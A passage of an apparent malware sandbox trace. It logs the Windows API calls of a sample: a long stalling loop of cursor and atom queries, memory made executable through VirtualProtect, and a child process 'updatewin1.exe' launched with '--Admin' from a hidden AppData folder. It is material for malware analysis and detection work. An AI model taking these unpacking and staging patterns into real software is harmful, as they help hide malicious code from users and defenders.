| out: lpBuffer=0x0) returned 0x0 [0181.653] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.653] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.653] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.653] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.653] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.653] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.653] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.654] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.654] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.655] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.655] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.656] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.656] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.657] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.657] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.657] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.657] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.657] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.657] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.657] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.657] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.657] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.657] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.658] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.658] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.659] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.659] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.659] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.659] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.659] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.659] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.659] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.659] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.659] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.659] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.659] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0183.662] lstrcpyA (in: lpString1=0x466cf8, lpString2="VirtualProtect" | out: lpString1="VirtualProtect") returned="VirtualProtect" [0183.662] LocalAlloc (uFlags=0x0, uBytes=0x55650) returned 0x3122e0 [0183.716] VirtualProtect (lpAddress=0x3122e0, dwSize=0x55650, flNewProtect=0x40, lpflOldProtect=0x18e998) Process: id = "10" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" page_root = "0x3d41f000" os_pid = "0xb04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xab4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" --Admin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 88 os_tid = 0xa00 [0181.624] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9faa6020, dwHighDateTime=0x1d60e72)) [0181.624] GetCurrentProcessId () returned 0xb04 [0181.624] GetCurrentThreadId () returned 0xa00 [0181.624] GetTickCount () returned 0x1156ff3 [0181.624] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=30163527836) returned 1 [0181.625] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0181.673] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2050000 [0181.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.675] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0181.675] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0181.675] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0181.676] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0181.676] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.676] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0181.676] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.677] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0181.677] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.677] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0181.677] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.677] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0181.677] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.677] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0181.678] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.678] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0181.678] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.678] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0181.679] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.679] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0181.679] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x214) returned 0x20507d0 [0181.679] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.680] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0181.680] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.680] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0181.680] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0181.680] GetCurrentThreadId () returned 0xa00 [0181.680] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0181.680] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x800) returned 0x20509f0 [0181.681] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0181.681] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0181.681] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0181.681] SetHandleCount (uNumber=0x20) returned 0x20 [0181.681] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" --Admin" [0181.681] GetEnvironmentStringsW () returned 0x554e78* [0181.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0181.681] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x0, Size=0x565) returned 0x20511f8 [0181.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x20511f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0181.681] FreeEnvironmentStringsW (penv=0x554e78) returned 1 [0181.681] GetLastError () returned 0x0 [0181.681] SetLastError (dwErrCode=0x0) [0181.681] GetLastError () returned 0x0 [0181.681] SetLastError (dwErrCode=0x0) [0181.682] GetLastError () returned 0x0 [0181.682] SetLastError (dwErrCode=0x0) [0181.682] GetACP () returned 0x4e4 [0181.682] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x0, Size=0x220) returned 0x2051768 [0181.682] GetLastError () returned 0x0 [0181.682] SetLastError (dwErrCode=0x0) [0181.682] IsValidCodePage (CodePage=0x4e4) returned 1 [0181.682] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0181.682] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0181.682] GetLastError () returned 0x0 [0181.682] SetLastError (dwErrCode=0x0) [0181.682] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0181.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0181.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0181.683] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0181.683] GetLastError () returned 0x0 [0181.683] SetLastError (dwErrCode=0x0) [0181.683] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0181.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0181.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䰝髇㞕AĀ") returned 256 [0181.683] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䰝髇㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0181.683] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䰝髇㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0181.683] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ 